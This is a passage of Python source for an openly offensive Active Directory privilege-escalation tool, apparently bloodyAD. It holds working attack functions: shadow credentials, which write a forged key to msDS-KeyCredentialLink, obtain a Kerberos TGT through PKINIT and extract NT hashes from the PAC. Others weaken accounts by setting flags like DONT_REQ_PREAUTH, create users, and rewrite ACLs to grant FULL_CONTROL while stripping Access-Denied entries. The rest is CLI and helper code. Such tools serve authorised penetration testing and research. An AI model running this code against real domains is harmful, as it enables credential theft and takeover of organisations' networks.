    subject = x509.Name.from_rfc4514_string(target_dn)
    cert = (
        x509.CertificateBuilder()
        .subject_name(subject)
        .issuer_name(subject)
        .serial_number(x509.random_serial_number())
        .public_key(key.public_key())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
        .sign(key, hashes.SHA256())
    )

    LOG.debug("Generating KeyCredential")

    keyCredential = cryptography.KEYCREDENTIALLINK_BLOB()
    keyCredential.keyCredentialLink_from_x509(cert)

    LOG.info(
        "KeyCredential generated with following sha256 of RSA key: %s"
        % binascii.hexlify(keyCredential.getKeyID()).decode()
    )

    LOG.debug("Updating the msDS-KeyCredentialLink attribute of %s" % target)

    key_dnbinary = common.DNBinary()
    key_dnbinary.fromCanonical(keyCredential.getData(), target_dn)
    await ldap.bloodymodify(
        target_dn,
        {"msDS-KeyCredentialLink": [(Change.ADD.value, str(key_dnbinary))]},
    )

    LOG.debug("msDS-KeyCredentialLink attribute of the target object updated")

    pfx = serialization.pkcs12.serialize_key_and_certificates(
        name=target_dn.encode(),
        key=key,
        cert=cert,
        cas=None,
        encryption_algorithm=serialization.NoEncryption(),
    )
    pfx_base64 = parse.quote(base64.b64encode(pfx).decode('utf-8'), safe="")

    client = None
    try:
        url = f"kerberos+pfxstr://{conn.conf.domain}\\{target_sAMAccountName}@{conn.conf.dcip}/?certdata={pfx_base64}&timeout=350"
        cu = factory.KerberosClientFactory.from_url(url)
        client = cu.get_client_blocking()
        tgs, enctgs, key, decticket = client.with_clock_skew(client.U2U)
    except Exception as e:
        pfx_path = path + ".pfx"
        with open(pfx_path, "wb") as f:
            f.write(pfx)
        LOG.error(f"PKINIT failed on DC {conn.conf.dcip}, you must find a Kerberos server with a certification authority!")
        LOG.error(f"Retry on a working KDC and do:\nbadNTPKInit 'kerberos+pfx://{conn.conf.domain}\\{target_sAMAccountName}@{conn.conf.dcip}/?certdata={pfx_base64}&timeout=350'")
        LOG.info(f"PKINIT PFX certificate saved at: %s" % pfx_path)
        raise e
    finally:
        if client and client.kerberos_TGT:
            ccache_path = path + ".ccache"
            client.ccache.to_file(path + ".ccache")
            LOG.info('TGT stored in ccache file %s' % ccache_path)
        # For the newconn opened if we had to use an alternative DC
        await ldap.close()
    
    return [{cred[0]:cred[1]} for cred in ticketutil.get_NT_from_PAC(client.pkinit_tkey, decticket)]

            


async def uac(conn: ConnectionHandler, target: str, f: list = None):
    """
    Add property flags altering user/computer object behavior

    :param target: sAMAccountName, DN or SID of the target
    :param f: name of property flag to add, can be called multiple times if multiple flags to add (e.g -f DONT_REQ_PREAUTH  -f DONT_EXPIRE_PASSWORD)
    """
    # TODO: Give scenarios with interesting account control flags

    # List of flags: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties

    # Some flags are computed (so can't be set directly? seems it depends because LOCKOUT can be removed but not added): LOCKOUT, PASSWORD_EXPIRED, PARTIAL_SECRETS_ACCOUNT, USE_AES_KEYS
    # https://learn.microsoft.com/en-us/windows/win32/adschema/a-msds-user-account-control-computed

    # The following flags are mutually exclusives and can't be changed by NetUserSetInfo (so maybe not modifiable at all?):
    # NORMAL_ACCOUNT, TEMP_DUPLICATE_ACCOUNT, WORKSTATION_TRUST_ACCOUNT, SERVER_TRUST_ACCOUNT, INTERDOMAIN_TRUST_ACCOUNT
    # https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/ns-lmaccess-user_info_1008#members

    # Privileges needed for TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION,TRUSTED_FOR_DELEGATION,PASSWD_NOTREQD,DONT_EXPIRE_PASSWD,ENCRYPTED_TEXT_PASSWORD_ALLOWED,SERVER_TRUST_ACCOUNT:
    # https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netusersetinfo#remarks

    ldap = await conn.getLdap()
    uac = 0
    for flag in f:
        uac |= accesscontrol.ACCOUNT_FLAGS[flag]

    try:
        entry = None
        async for e in ldap.bloodysearch(target, attr=["userAccountControl"], raw=True):
            entry = e
            break
        old_uac = entry["userAccountControl"][0]
    except IndexError as e:
        entry = None
        async for e in ldap.bloodysearch(target, attr=["allowedAttributes"]):
            entry = e
            break
        for allowed in entry["allowedAttributes"]:
            if "userAccountControl" in allowed:
                raise BloodyError(
                    "Current user doesn't have the right to read userAccountControl on"
                    f" {target}"
                ) from e
        raise BloodyError(f"{target} doesn't have userAccountControl attribute") from e
    uac |= int(old_uac)
    await ldap.bloodymodify(
        target, {"userAccountControl": [(Change.REPLACE.value, uac)]}
    )

    LOG.info(f"{f} property flags added to {target}'s userAccountControl")


async def user(conn: ConnectionHandler, sAMAccountName: str, newpass: str, ou: str = "DefaultOU", lifetime: int = 0):
    """
    Add a new user

    :param sAMAccountName: sAMAccountName for new user
    :param newpass: password for new user
    :param ou: Organizational Unit for new user
    :param lifetime: lifetime of new user in seconds, if non-zero creates it as a dynamic object
    """
    ldap = await conn.getLdap()
    if ou == "DefaultOU":
        container = None
        entry = None
        async for e in ldap.bloodysearch(ldap.domainNC, attr=["wellKnownObjects"]):
            entry = e
            break
        for obj in entry["wellKnownObjects"]:
            if "GUID_USERS_CONTAINER_W" == obj.binary_value:
                container = obj.dn
                break
        if not container:
            LOG.warning(
                "Default container for users not found, defaulting to CN=Users,"
                + ldap.domainNC
            )
            container = "cn=Users" + ldap.domainNC
        user_dn = f"cn={sAMAccountName},{container}"
    else:
        user_dn = f"cn={sAMAccountName},{ou}"

    attr = {
        "objectClass": ["top", "person", "organizationalPerson", "user"],
        "distinguishedName": user_dn,
        "sAMAccountName": sAMAccountName,
        "userAccountControl": 544,
        "unicodePwd": '"%s"' % newpass,
    }

    if lifetime > 0:
        attr["objectClass"].append("dynamicObject")
        attr["entryTTL"] = lifetime

    await ldap.bloodyadd(user_dn, attributes=attr)
    LOG.info(f"{sAMAccountName} created")



from bloodyAD.exceptions import LOG
from bloodyAD.formatters import (
    ldaptypes,
    accesscontrol,
    adschema,
)
from bloodyAD.network.ldap import Scope, phantomRoot
import types, base64, collections, asyncio
from winacl import dtyp
from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR
from badldap.network import reacher


def addRight(
    sd,
    user_sid,
    access_mask=accesscontrol.ACCESS_FLAGS["FULL_CONTROL"],
    object_type=None,
):
    user_sid = dtyp.sid.SID.from_string(user_sid)
    user_aces = [
        ace
        for ace in sd["Dacl"].aces
        if ace["Ace"]["Sid"].getData() == user_sid.to_bytes()
    ]
    new_ace = accesscontrol.createACE(user_sid.to_bytes(), object_type, access_mask)
    if object_type:
        access_denied_type = ldaptypes.ACCESS_DENIED_OBJECT_ACE.ACE_TYPE
    else:
        access_denied_type = ldaptypes.ACCESS_DENIED_ACE.ACE_TYPE
    hasPriv = False

    for ace in user_aces:
        new_mask = new_ace["Ace"]["Mask"]
        mask = ace["Ace"]["Mask"]

        # Removes Access-Denied ACEs interfering
        if ace["AceType"] == access_denied_type and new_mask.hasPriv(mask["Mask"]):
            sd["Dacl"].aces.remove(ace)
            LOG.debug("An interfering Access-Denied ACE has been removed:")
            LOG.debug(ace)
        # Adds ACE if not already added
        elif ace.hasFlag(new_ace["AceFlags"]) and mask.hasPriv(new_mask["Mask"]):
            hasPriv = True
            break

    if hasPriv:
        LOG.debug("This right already exists")
    else:
        sd["Dacl"].aces.append(new_ace)

    isAdded = not hasPriv
    return isAdded


def delRight(
    sd,
    user_sid,
    access_mask=accesscontrol.ACCESS_FLAGS["FULL_CONTROL"],
    object_type=None,
):
    isRemoved = False
    user_sid = dtyp.sid.SID.from_string(user_sid)
    user_aces = [
        ace
        for ace in sd["Dacl"].aces
        if ace["Ace"]["Sid"].getData() == user_sid.to_bytes()
    ]
    if object_type:
        access_allowed_type = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
    else:
        access_allowed_type = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE

    for ace in user_aces:
        mask = ace["Ace"]["Mask"]
        if ace["AceType"] == access_allowed_type and mask.hasPriv(access_mask):
            mask.removePriv(access_mask)
            LOG.debug("Privilege Removed")
            if mask["Mask"] == 0:
                sd["Dacl"].aces.remove(ace)
            isRemoved = True

    if not isRemoved:
        LOG.debug("No right to remove")
    return isRemoved


async def getSD(
    conn,
    object_id,
    ldap_attribute="nTSecurityDescriptor",
    control_flag=accesscontrol.DACL_SECURITY_INFORMATION,
):
    ldap = await conn.getLdap()
    entry = None
    async for e in ldap.bloodysearch(
            object_id, attr=[ldap_attribute], control_flag=control_flag, raw=True
        ):
        entry = e
        break
    sd_data = entry.get(ldap_attribute, []) if entry else []
    if len(sd_data) < 1:
        LOG.warning(
            "No security descriptor has been returned, a new one will be created"
        )
        sd = accesscontrol.createEmptySD()
    else:
        sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data[0])

    LOG.debug(
        "[*] Old Security Descriptor: "
        + "\t".join([SECURITY_DESCRIPTOR.from_bytes(sd).to_sddl() for sd in sd_data])
    )
    return sd, sd_data


# First elt in grouping order is the first grouping criterium
def groupBy(rows, grouping_order):
    try:
        grouping_key = grouping_order.pop()
        merged = groupBy(rows, grouping_order)
    except IndexError:  # We exhausted all grouping criteriums
        return rows

    new_merge = []
    for row in merged:
        isMergeable = False
        for new_row in new_merge:
            isMergeable = True
            for k in row:
                if k == grouping_key:
                    continue
                try:
                    if row[k] != new_row[k]:
                        isMergeable = False
                        break
                except (
                    KeyError
                ):  # If one of the rows doesn't have the non grouping property, it can't be merged
                    continue
            if isMergeable:
                new_row[grouping_key] |= row[grouping_key]
                break
        if not isMergeable:
            new_merge.append(row)
    return new_merge


ACCESS_RIGHTS = {
    "CREATE_CHILD": (0x1,),
    "DELETE_CHILD": (0x2,),
    "LIST_CHILD": (0x4,),  # LIST_CONTENTS
    "WRITE_VALIDATED": (0x8,),  # WRITE_PROPERTY_EXTENDED
    "READ_PROP": (0x10,),
    "WRITE_PROP": (0x20,),  # Does it contains WRITE VALIDATED?
    "DELETE_TREE": (0x40,),
    "LIST_OBJECT": (0x80,),
    "CONTROL_ACCESS": (0x100,),
    "DELETE": (0x10000,),
    "READ_SD": (0x20000,),
    "WRITE_DACL": (0x40000,),
    "WRITE_OWNER": (0x80000,),
    "ACCESS_SYSTEM_SECURITY": (0x1000000,),
    "SYNCHRONIZE": (0x100000,),
}
ACCESS_RIGHTS["GENERIC_EXECUTE"] = (
    0x20000000,
    ACCESS_RIGHTS["READ_SD"][0] | ACCESS_RIGHTS["LIST_CHILD"][0],
)
ACCESS_RIGHTS["GENERIC_WRITE"] = (
    0x40000000,
    ACCESS_RIGHTS["READ_SD"][0]
    | ACCESS_RIGHTS["WRITE_PROP"][0]
    | ACCESS_RIGHTS["WRITE_VALIDATED"][0],
)
ACCESS_RIGHTS["GENERIC_READ"] = (
    0x80000000,
    ACCESS_RIGHTS["READ_SD"][0]
    | ACCESS_RIGHTS["READ_PROP"][0]
    | ACCESS_RIGHTS["LIST_CHILD"][0]
    | ACCESS_RIGHTS["LIST_OBJECT"][0],
)
ACCESS_RIGHTS["GENERIC_ALL"] = (
    0x10000000,
    ACCESS_RIGHTS["GENERIC_EXECUTE"][0]
    | ACCESS_RIGHTS["GENERIC_WRITE"][0]
    | ACCESS_RIGHTS["GENERIC_READ"][0]
    | ACCESS_RIGHTS["DELETE"][0]
    | ACCESS_RIGHTS["DELETE_TREE"][0]
    | ACCESS_RIGHTS["CONTROL_ACCESS"][0]
    | ACCESS_RIGHTS["CREATE_CHILD"][0]
    | ACCESS_RIGHTS["DELETE_CHILD"][0]
    | ACCESS_RIGHTS["WRITE_DACL"][0]
    | ACCESS_RIGHTS["WRITE_OWNER"][0],
    ACCESS_RIGHTS["READ_SD"][0]
    | ACCESS_RIGHTS["READ_PROP"][0]
    | ACCESS_RIGHTS["LIST_CHILD"][0]
    | ACCESS_RIGHTS["LIST_OBJECT"][0]
    | ACCESS_RIGHTS["WRITE_PROP"][0]
    | ACCESS_RIGHTS["WRITE_VALIDATED"][0]
    | ACCESS_RIGHTS["DELETE"][0]
    | ACCESS_RIGHTS["DELETE_TREE"][0]
    | ACCESS_RIGHTS["CONTROL_ACCESS"][0]
    | ACCESS_RIGHTS["CREATE_CHILD"][0]
    | ACCESS_RIGHTS["DELETE_CHILD"][0]
    | ACCESS_RIGHTS["WRITE_DACL"][0]
    | ACCESS_RIGHTS["WRITE_OWNER"][0],
)
# Reverse is sorted for mask operations
REVERSE_ACCESS_RIGHTS = dict(
    sorted(
        [
            (mask, flag)
            for flag, masktuple in ACCESS_RIGHTS.items()
            for mask in masktuple
        ],
        reverse=True,
    )
)


class Right:
    def __init__(self, mask):
        self.mask = mask

    def __str__(self):
        flag_list = []
        tmp_mask = self.mask
        for key_mask in REVERSE_ACCESS_RIGHTS:
            if (
                key_mask & ~tmp_mask
            ) > 0:  # Means key_mask is including bits not in tmp_mask
                continue
            remainder = (
                tmp_mask & ~key_mask
            )  # We keep a remainder of tmp_mask with complement of key_mask if tmp_mask is bigger than key_mask
            flag_list.append(REVERSE_ACCESS_RIGHTS[key_mask])
            tmp_mask = remainder
            if remainder == 0:
                break
        if tmp_mask != 0:  # If there is unknown mask
            flag_list.append(str(tmp_mask))
        return "|".join(flag_list)


class Control:
    def __init__(self, control_enum):
        self.control_enum = control_enum

    def __str__(self):
        flag_str = repr(self.control_enum).split(".")[1].split(":")[0]
        flag_str = flag_str.replace("SE_", "")
        return flag_str


class AceType:
    def __init__(self, acetype_enum):
        self.acetype_enum = acetype_enum

    def __eq__(self, o):
        if not isinstance(o, AceType):
            return NotImplemented
        return self.acetype_enum == o.acetype_enum

    def __str__(self):
        flag_str = repr(self.acetype_enum).split(".")[1].split(":")[0]
        flag_str = flag_str.replace("ACCESS_", "")
        flag_str = flag_str.replace("SYSTEM_", "")
        flag_str = flag_str.replace("_ACE_TYPE", "")
        return f"== {flag_str} =="


class AceFlag:
    def __init__(self, aceflag_enum):
        self.aceflag_enum = aceflag_enum

    def __str__(self):
        flag_str = repr(self.aceflag_enum).split(".")[1].split(":")[0]
        flag_str = flag_str.replace("_ACE_FLAG", "")
        flag_str = flag_str.replace("_ACE", "")
        return flag_str


class LazyAdSchema:
    guids = set()
    sids = set()
    # All known guids
    guid_dict = {
        **adschema.OBJECT_TYPES,
        "Self": "Self",
    }
    # All known sids
    sid_dict = dtyp.sid.well_known_sids_sid_name_map
    isResolved = False

    # We resolve every guid/sid in one request to be more efficient
    # Put the load on the server instead of the client
    # Perfect in case of bad network
    async def _resolveAll(self):
        if self.isResolved:
            return

        async def domResolve(conn, sid_iter):
            # WARNING: only 512 filters max per request
            filters = []
            buffer_filter = ""
            filter_nb = 0
            for sid in sid_iter:
                if filter_nb > 511:
                    filters.append(buffer_filter)
                    buffer_filter = ""
                    filter_nb = 0
                buffer_filter += f"(objectSid={sid})"
                filter_nb += 1

            if conn == self.conn:
                for guid in self.guids:
                    if filter_nb > 511:
                        filters.append(buffer_filter)
                        buffer_filter = ""
                        filter_nb = 0
                    guid_bin_str = "\\" + "\\".join(
                        [
                            "{:02x}".format(b)
                            for b in dtyp.guid.GUID().from_string(guid).to_bytes()
                        ]
                    )
                    buffer_filter += (
                        f"(rightsGuid={str(guid)})(schemaIDGUID={guid_bin_str})"
                    )
                    filter_nb += 2
            filters.append(buffer_filter)

            # Search in all non application partitions
            for ldap_filter in filters:
                ldap = await conn.getLdap()
                entries = ldap.bloodysearch(
                    "",
                    ldap_filter=f"(|{ldap_filter})",
                    attr=[
                        "name",
                        "sAMAccountName",
                        "objectSid",
                        "rightsGuid",
                        "schemaIDGUID",
                    ],
                    search_scope=Scope.SUBTREE,
                    controls=[phantomRoot()],
                )
                async for entry in entries:
                    if entry.get("objectSid"):
                        self.sid_dict[entry["objectSid"]] = (
                            entry["sAMAccountName"]
                            if entry.get("sAMAccountName")
                            else entry["name"]
                        )
                    else:
                        if entry.get("rightsGuid"):
                            key = entry["rightsGuid"]
                        elif entry.get("schemaIDGUID"):
                            key = entry["schemaIDGUID"]
                        else:
                            LOG.warning(f"No guid/sid returned for {entry}")
                            continue
                        self.guid_dict[key] = entry["name"]

        sidmap = collections.defaultdict(list)
        if getattr(self.conn.conf, "transitive"):
            ldap = await self.conn.getLdap()
            trustmap = await ldap.getTrustMap()
            for sid in self.sids:
                for dom_params in trustmap.values():
                    if dom_params.get("conn") and sid.startswith(dom_params["domsid"]):
                        sidmap[dom_params["conn"]].append(sid)
            for conn, sidlist in sidmap.items():
                await domResolve(conn, sidlist)
        else:
            await domResolve(self.conn, self.sids)

        # Cleanup resolved ids from queues
        self.isResolved = True
        self.guids = set()
        self.sids = set()

    def addguid(self, guid):
        # Should not add in set to resolve after if it is already resolved
        if guid not in self.guid_dict:
            self.guids.add(guid)

    def addsid(self, sid):
        # Should not add in set to resolve after if it is already resolved
        if sid not in self.sid_dict:
            self.sids.add(sid)

    # Return name mapped to the guid
    async def getguid(self, guid):
        try:
            return self.guid_dict[guid]
        except KeyError:
            if not self.isResolved:
                await self._resolveAll()
                return await self.getguid(guid)
            else:
                return guid

    # Return name mapped to the sid
    async def getsid(self, sid):
        try:
            return self.sid_dict[sid]
        except KeyError:
            if not self.isResolved:
                await self._resolveAll()
                return await self.getsid(sid)
            else:
                return sid


global_lazy_adschema = LazyAdSchema()


class LazyGuid:
    def __init__(self, guid):
        self.guid = guid
        global_lazy_adschema.addguid(guid)
        self._resolved = None

    async def resolve(self):
        if self._resolved is None:
            self._resolved = await global_lazy_adschema.getguid(self.guid)
        return self._resolved

    def __str__(self):
        # Return cached resolution if available, otherwise return the raw guid
        if self._resolved is not None:
            return self._resolved
        return self.guid


class LazySid:
    def __init__(self, sid):
        self.sid = sid
        global_lazy_adschema.addsid(sid)
        self._resolved = None

    async def resolve(self):
        if self._resolved is None:
            self._resolved = await global_lazy_adschema.getsid(self.sid)
        return self._resolved

    def __str__(self):
        # Return cached resolution if available, otherwise return the raw sid
        if self._resolved is not None:
            return self._resolved
        return self.sid


def aceFactory(k, a):
    if k == "Trustee":
        return LazySid(a)
    elif k == "Right":
        return Right(a)
    elif k in ("ObjectType", "InheritedObjectType"):
        return LazyGuid(a)
    elif k == "Flags":
        return AceFlag(a)
    else:
        return a


async def renderSD(sddl, conn):
    global_lazy_adschema.conn = conn
    sd = SECURITY_DESCRIPTOR.from_sddl(sddl)
    # We don't print Revision because it's always 1,
    # Group isn't used in ADDS
    renderedSD = {"Owner": LazySid(str(sd.Owner)), "Control": Control(sd.Control)}
    rendered_aces = []
    allAces = []
    if sd.Dacl:
        allAces += sd.Dacl.aces
    if sd.Sacl:
        allAces += sd.Sacl.aces
    for ace in allAces:
        rendered_ace = {
            "Type": AceType(ace.AceType),
            "Trustee": set([str(ace.Sid)]),
            "Right": ace.Mask,
            "ObjectType": set(),
            "InheritedObjectType": set(),
            "Flags": ace.AceFlags,
        }

        if hasattr(ace, "ObjectType") and ace.ObjectType:
            object_guid_str = str(ace.ObjectType)
        else:
            object_guid_str = "Self"
        rendered_ace["ObjectType"].add(object_guid_str)
        if hasattr(ace, "InheritedObjectType") and ace.InheritedObjectType:
            rendered_ace["InheritedObjectType"].add(str(ace.InheritedObjectType))

        rendered_aces.append(rendered_ace)

    grouped_aces = groupBy(
        rendered_aces,
        ["ObjectType", "Trustee", "Flags", "InheritedObjectType", "Right"],
    )
    typed_aces = []
    lazy_objects = [renderedSD["Owner"]]  # Collect all lazy objects for resolution
    
    for ace in grouped_aces:
        typed_ace = {}
        for k, v in ace.items():
            if not v:
                continue
            try:
                typed_ace[k] = []
                for a in v:  # If it's a set of guids/sids
                    obj = aceFactory(k, a)
                    typed_ace[k].append(obj)
                    if isinstance(obj, (LazyGuid, LazySid)):
                        lazy_objects.append(obj)
            except TypeError:  # If it's a mask
                typed_ace[k] = aceFactory(k, v)

        typed_aces.append(typed_ace)

    # Resolve all lazy objects
    for obj in lazy_objects:
        if isinstance(obj, (LazyGuid, LazySid)):
            await obj.resolve()

    renderedSD["ACL"] = typed_aces

    return renderedSD


async def renderSearchResult(entries: types.AsyncGeneratorType) -> types.AsyncGeneratorType:
    """
    Takes entries as an asynchronous generator of dicts ({dn: <list/generator with one depth or primitive type or raw bytes>},{...}...)
    Yields each entry as a dict, converting raw bytes to base64 if not decodable in utf-8.
    Sorts entry attributes alphabetically (except 'distinguishedName' is first).
    This function is now an async generator and must be iterated with 'async for'.
    """
    decoded_entry = {}
    async for entry in entries:
        entry = {
            **{"distinguishedName": entry["distinguishedName"]},
            **{k: v for k, v in sorted(entry.items()) if k != "distinguishedName"},
        }
        for attr_name, attr_members in entry.items():
            if type(attr_members) in [list, types.GeneratorType]:
                decoded_entry[attr_name] = []
                for member in attr_members:
                    if type(member) is bytes:
                        try:
                            decoded = member.decode()
                        except UnicodeDecodeError:
                            decoded = base64.b64encode(member).decode()
                    else:
                        decoded = member
                    decoded_entry[attr_name].append(decoded)
            else:
                if type(attr_members) is bytes:
                    try:
                        decoded = attr_members.decode()
                    except UnicodeDecodeError:
                        decoded = base64.b64encode(attr_members).decode()
                else:
                    decoded = attr_members
                decoded_entry[attr_name] = decoded
        yield decoded_entry
        decoded_entry = {}


async def findCompatibleDC(conn, min_version: int = 0, max_version: int = 1000, scope: str = "DOMAIN"):
    """
    Find a list of compatible Domain Controllers in the domain, forest.

    Return a list of hostnames with their IPs of compatible DCs.
    """
    if scope not in {"DOMAIN", "FOREST"}:
        raise ValueError("Invalid scope. Scope must be 'DOMAIN', 'FOREST'")

    dc_dict = collections.defaultdict(dict)
    ldap = await conn.getLdap()

    async for dc_info in ldap.bloodysearch(
        "CN=Sites,"+ldap.configNC,
        "(|(objectClass=nTDSDSA)(objectClass=server))",
        search_scope=Scope.SUBTREE,
        attr=["msDS-Behavior-Version", "msDS-HasDomainNCs", "objectClass", "dNSHostName"],
        raw=True,
    ):
        if b"nTDSDSA" in dc_info["objectClass"]:
            parent_name = dc_info["distinguishedName"].split(",", 1)[1]
            dc_dict[parent_name]["version"] = int(dc_info["msDS-Behavior-Version"][0])
            dc_dict[parent_name]["domainNCs"] = dc_info["msDS-HasDomainNCs"]
        elif b"server" in dc_info["objectClass"]:
            dc_dict[dc_info["distinguishedName"]]["hostname"] = dc_info["dNSHostName"][0].decode()

    compatible_dcs = []
    for dc_info in dc_dict.values():
        if min_version <= dc_info["version"] <= max_version and (scope == "FOREST" or (scope == "DOMAIN" and ldap.domainNC.encode() in dc_info.get("domainNCs"))):
            compatible_dcs.append(dc_info["hostname"])
    return compatible_dcs

async def connectReachable(conn, srv_names: list, ports: list = [389, 636, 3268, 3269]):
    """
    Connect to a reachable server from the provided list.

    Return a connection object or a dict with connection information if protocol not supported.
    """
    record_list = []
    new_conn = None
    for srv_name in srv_names:
        record_list.append({"type": ["A"], "name": srv_name})
    host_params = await reacher.findReachableServer(record_list, conn.conf.dns, conn.conf.dcip, ports)
    if host_params:
        schemes = {389: "ldap", 636: "ldaps", 3268: "gc", 3269: "gc-ssl"}
        if host_params["port"] not in schemes:
            LOG.debug(f"Protocol for port {host_params['port']} not supported, please open a connection manually")
            return host_params
        new_conn = conn.copy(
            scheme=schemes[host_params["port"]],
            host=host_params["name"],
            dcip=host_params["ip"],
        )
    else:
        LOG.warning(
            "No reachable server found, try to provide one manually in --host or a dns server with --dns"
        )
    return new_conn



#!/usr/bin/env python3
from bloodyAD.patch import *
from bloodyAD import cli_modules, ConnectionHandler, exceptions
import sys, argparse, types, json, asyncio

# For dynamic argparse
import inspect, pkgutil, importlib


async def main():
    parser = argparse.ArgumentParser(description="AD Privesc Swiss Army Knife")

    parser.add_argument("-d", "--domain", help="Domain used for NTLM authentication")
    parser.add_argument(
        "-u", "--username", help="Username used for NTLM authentication"
    )
    parser.add_argument(
        "-p",
        "--password",
        help=(
            "password or LMHASH:NTHASH for NTLM authentication, password or AES/RC4 key for kerberos, password for certificate"
            " (Do not specify to trigger integrated windows authentication)"
        ),
    )
    parser.add_argument(
        "-k",
        "--kerberos",
        nargs="*",
        help=(
            "Enable Kerberos authentication. If '-p' is provided it will try to query a TGT with it. You can also provide a list of one or more optional keywords as '-k kdc=192.168.100.1 kdcc=192.168.150.1 realmc=foreign.realm.corp <keyfile_type>=/home/silver/Admin.ccache', <keyfile_type> being ccache, kirbi or keytab, 'kdc' being the kerberos server for the keyfile provided and 'realmc' and 'kdcc' for cross realm (the realm of the '--host' provided)"
        ),
    )
    parser.add_argument(
        "-f",
        "--format",
        help="Specify format for '--password' or '-k <keyfile>'",
        choices=["b64", "hex", "aes", "rc4", "default"],
        default="default",
    )
    parser.add_argument(
        "-c",
        "--certificate",
        nargs="?",
        help='Schannel authentication or krb pkinit if -k also provided, e.g: "path/to/key:path/to/cert" (Use Windows Certstore with krb if left empty)',
    )
    
    parser.add_argument(
        "-s",
        "--secure",
        help="Use LDAP/GC over TLS (LDAPS/GCS). Use -ss to remove all encryption/signing (useful for debug).",
        action="count",
        default=0,
    )

    parser.add_argument(
        "-H",
        "--host",
        help="Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)",
        required=True
    )
    parser.add_argument(
        "-i",
        "--dc-ip",
        help="IP of the DC (useful if you provided a --host which can't resolve)",
    )
    parser.add_argument(
        "--dns",
        help="IP of the DNS to resolve AD names (useful for inter-domain functions)",
    )
    parser.add_argument(
        "-t",
        "--timeout",
        help="Connection timeout in seconds",
    )
    parser.add_argument(
        "--gc",
        help="Connect to Global Catalog (GC)",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "-v",
        "--verbose",
        help="Adjust output verbosity",
        choices=["QUIET", "INFO", "DEBUG", "TRACE"],
        default="INFO",
    )
    parser.add_argument(
        "--json",
        help="Output results in JSON format",
        action="store_true",
        default=False,
    )

    subparsers = parser.add_subparsers(title="Commands")
    submodnames = []
    # Iterates all submodules in module package and creates one parser per submodule
    for importer, submodname, ispkg in pkgutil.iter_modules(cli_modules.__path__):
        submodnames.append(submodname)
        subparser = subparsers.add_parser(
            submodname, help=f"[{submodname.upper()}] function category"
        )
        subsubparsers = subparser.add_subparsers(title=f"{submodname} commands")
        submodule = importlib.import_module("." + submodname, cli_modules.__name__)
        for function_name, function in inspect.getmembers(
            submodule, inspect.isfunction
        ):
            function_doc, params_doc = doc_parser(inspect.getdoc(function))
            # This formatter class prints default values
            subsubparser = subsubparsers.add_parser(
                function_name,
                help=function_doc,
                formatter_class=argparse.ArgumentDefaultsHelpFormatter,
            )
            # Gets function signature to extract parameters default values
            func_signature = inspect.signature(function)
            function_annotations = {pname: pval for pname, pval in function.__annotations__.items() if pname != "conn"}
            for param_name, param_value, param_doc in zip(
                function_annotations.keys(),
                function_annotations.values(),
                params_doc,
            ):
                parser_args = {}

                # Fetches help from param_doc, if param_name doesn't match
                # name in param_doc, raises exception
                try:
                    param_doc = param_doc.split(f":param {param_name}: ")[1]
                except IndexError as e:
                    raise IndexError(f"param_name '{param_name}' doesn't match '{param_doc}'") from e
                parser_args["help"] = param_doc

                # If parameter has a default value, then it will be an optional argument
                param_signature = func_signature.parameters.get(param_name)
                if param_signature.default is param_signature.empty:
                    arg_name = param_name
                else:
                    # If param with one letter only add just one dash
                    if len(param_name) < 2:
                        arg_name = f"-{param_name}"
                    else:
                        param_name = param_name.replace("_", "-")
                        arg_name = f"--{param_name}"
                    parser_args["default"] = param_signature.default

                # If param_type is not a string describing a type it's a literal with a restricted set of values
                if "Literal" in str(param_value):
                    parser_args["choices"] = param_value.__args__
                    parser_args["type"] = type(param_value.__args__[0])
                else:
                    if param_value.__name__ == "bool":
                        parser_args["action"] = "store_true"
                    elif param_value.__name__ == "list":
                        parser_args["action"] = "append"
                        parser_args["type"] = str
                    else:
                        parser_args["type"] = param_value

                subsubparser.add_argument(arg_name, **parser_args)
            # If a function name is provided in cli, arg.func will exist with function as value
            subsubparser.set_defaults(func=function)

    # Preprocess the input arguments because nargs ? and * can capture subparsers commands if put at the end
    # So we always put the --host option at the end
    input_args = sys.argv[1:]
    isHost = False
    parsed_args = []
    host_arg = None
    for arg in input_args:
        if arg in ["-H", "--host"]:
            isHost = True
        elif isHost:
            isHost = False
            host_arg = arg
        elif arg in submodnames:
            parsed_args.append("--host")
            parsed_args.append(host_arg)
            parsed_args.append(arg)
        else:
            parsed_args.append(arg)
    args = parser.parse_args(parsed_args)

    if "func" not in args:
        parser.print_help(sys.stderr)
        sys.exit(1)
    # Get the list of parameters to provide to the command
    param_names = args.func.__code__.co_varnames[1 : args.func.__code__.co_argcount]
    params = {param_name: vars(args)[param_name] for param_name in param_names}

    # Configure loggers #

    # Doesn't work when launching new threads in bloodyAD.ldap so we'll use propagate to false below
    # # Enable all children loggers in debug mode
    # logging.getLogger().setLevel(logging.DEBUG)
    # # Make the root logger quiet
    # # WARNING: operation below is not thread safe!
    # logging.getLogger().handlers = []

    exceptions.enableCliLogger(level=args.verbose)
    # We show badldap logs only if debug is enabled
    # import badldap
    # if args.verbose == "DEBUG":
    #     badldap.logger.handlers = []
    #     handler = logging.StreamHandler(sys.stdout)
    #     handler.setLevel(logging.DEBUG)
    #     formatter = logging.Formatter('[badldap] %(message)s')
    #     handler.setFormatter(formatter)
    #     badldap.logger.addHandler(handler)
    #     badldap.logger.setLevel(logging.DEBUG)
    #     badldap.logger.propagate = False

    # Launch the command
    conn = ConnectionHandler(args=args)
    try:
        result = args.func(conn, **params)
        # Helper functions for output
        def print_human_entry(entry):
            print()
            for attr_name, attr_val in entry.items():
                entry_str = print_entry(attr_name, attr_val)
                if not (entry_str is None or entry_str == ""):
                    print(f"{attr_name}: {entry_str}")

        def print_json_stream(entries):
            first = True
            print('[', end='')
            for entry in entries:
                if not first:
                    print(',', end='')
                print(json.dumps(json_serialize_entry(entry), indent=2), end='')
                first = False
